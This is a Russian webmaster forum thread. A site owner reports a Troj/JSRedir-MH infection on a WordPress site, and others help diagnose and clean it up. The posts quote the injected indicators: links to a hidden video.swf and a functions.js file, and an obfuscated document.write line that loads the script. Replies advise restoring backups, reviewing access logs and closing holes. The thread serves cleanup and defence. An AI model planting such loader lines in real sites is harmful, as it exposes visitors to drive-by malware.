- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
http://pravogroup.ru/wp-includes/images/crystal/video.swf
http://pravogroup.ru/wp-includes/images/smilies/functions.js
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
<script type='text/javascript' src='http://pravogroup.ru/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0'></script>
Обратный порядок для обнаружения.
Саму флешку было лень ковырять, возможно она не при чем, но скорее всего:
1. Зачем шифровать, если она нормальная
2. Эксплуатирует уязвимость в какой-то версии Флеш-плеера.
Большое спасибо, что глянули.😎🍻
http://pravogroup.ru/wp-includes/images/crystal/video.swf
http://pravogroup.ru/wp-includes/images/smilies/functions.js
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
<script type='text/javascript' src='http://pravogroup.ru/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0'></script>
Это вирус или только подозрение?
Как Вы это нашли?
Как эти скрипты проявляют себя, чем опасны?
Обратный порядок для обнаружения.
Саму флешку было лень ковырять, возможно она не при чем, но скорее всего:
1. Зачем шифровать, если она нормальная
2. Эксплуатирует уязвимость в какой-то версии Флеш-плеера.
Почему Яша ссылается чутко на другие каталоги?
Это - поведенческий анализ, если вы понимаете суть.
На конфе именно такие примеры показывали, весьма сложно программно найти, поэтому анализ идет на ПФ.
Тут нечего искать - сразу видны "странные" вставки.
video.swf - вскроете и станет ясно что это.
Сейчас:
Смотрите бекапы, если этого раньше не было - удаляйте все.
Потом ищете как злоумышленник смог получить доступ и закрывайте дыры на сайте.
Не понял.
Жаль, нет кнопки спасибо. 🍻🍻😎😎
Это - поведенческий анализ, если вы понимаете суть.
На конфе именно такие примеры показывали, весьма сложно программно найти, поэтому анализ идет на ПФ.
Тут нечего искать - сразу видны "странные" вставки.
Поведение совпадает с эвристическими правилами, характерными для drive-by-download атак.
Я понял нашли просто глазками, без программ.
video.swf - вскроете и станет ясно что это.
Мне не ясно, я его приложил к письму, как он работает?
Сейчас:
Смотрите бекапы, если этого раньше не было - удаляйте все.
Интересно было бы удалить вредноносный код. Планировал вырезать указанные Вами скрипты.
Потом ищете как злоумышленник смог получить доступ и закрывайте дыры на сайте.
Попросил хостера направить мне логи изменений по FTP, SSH и HTML.
После изучения планирую: заблокировать по ip хакеров, логи выложу сюда, возможно, закрою FTP и поменяю права, там видно будет.
Не понял.
/ru/forum/comment/12232785
После Вердикт
10.10.2013
Бесполезное занятие.
Логи доступа к сайту все надо смотреть access.log
Там искать "подозрительные действия"
Скачать его - не составляет труда, а вот разбирать желания нету, пробуйте сами анализировать, либо нанимайте спецов
Защита - работа комплексная, не следует об этом забывать.
Программисту/админу - гораздо сложнее, чем хакеру.
Хакеры - надо всего лишь найти 1 дыру, программисту - закрыть тысячи возможных.
М.б. поможет кому:
вылечился недавно от Troj/JSRedir-MH (так со ссылкой на sophos его обозвал Яндекс)
сам скрипт лежал в administrator/templates/bluestork/main.js
ссыль на него дописалась последней строкой в components/com_virtuemart/assets/js/vmsite.js
Собственно строка:
код самого скрипта:
М.б. поможет кому:
вылечился недавно от Troj/JSRedir-MH (так со ссылкой на sophos его обозвал Яндекс)
сам скрипт лежал в administrator/templates/bluestork/main.js
ссыль на него дописалась последней строкой в components/com_virtuemart/assets/js/vmsite.js
Спасибо огромное, надеемся, что и нам поможет, яндекс пока не перепроверил, ждём...
Обозвал он его так-же: Troj/JSRedir-MH
Саму строку нашёл в конце файла одного из модов, выглядела вот так:
И собственно сам файл
В предыдущих бэкапах он видоизменялся, и имел, к примеру, вот такой вид, по моему такой-же, как и у вас:
Может быть подскажете на что ещё обратить внимание, чтобы досконально вычистить эту заразу?
Заранее спасибо!
Еще стоит обратить внимание на тот swf файл, путь к которому зашифрован в скрипте.
И собственно не забыть удалить этот swf файл.
На хабре писали как дешифрировать http://habrahabr.ru/post/196882/
А смысл его разбирать?
И так ясно что его удалять надо )
Но его же найти надо, а путь к swf файлу зашифрован )
Вирусописатели на славу постарались )